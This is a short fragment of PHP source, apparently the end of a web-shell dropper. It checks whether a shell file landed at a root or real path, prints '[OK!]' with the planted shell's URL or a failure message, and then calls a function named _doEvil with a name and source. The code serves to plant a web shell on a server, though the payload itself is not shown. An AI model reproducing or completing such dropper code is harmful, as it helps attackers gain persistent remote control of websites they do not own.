"; if($toRootExec) { if(file_exists($rootPath."$filename")) { echo "

[OK!] $rootShellUrl

"; } else { echo "

$rootPath$filename
Doesn't exist!
Try with another method!

"; } } else { if($toRealExec) { if(file_exists($realPath."$filename")) { echo "

[OK!] $realShellUrl

"; } else { echo "

FAILED!

"; } } } echo ""; } _doEvil($name, $source); ?>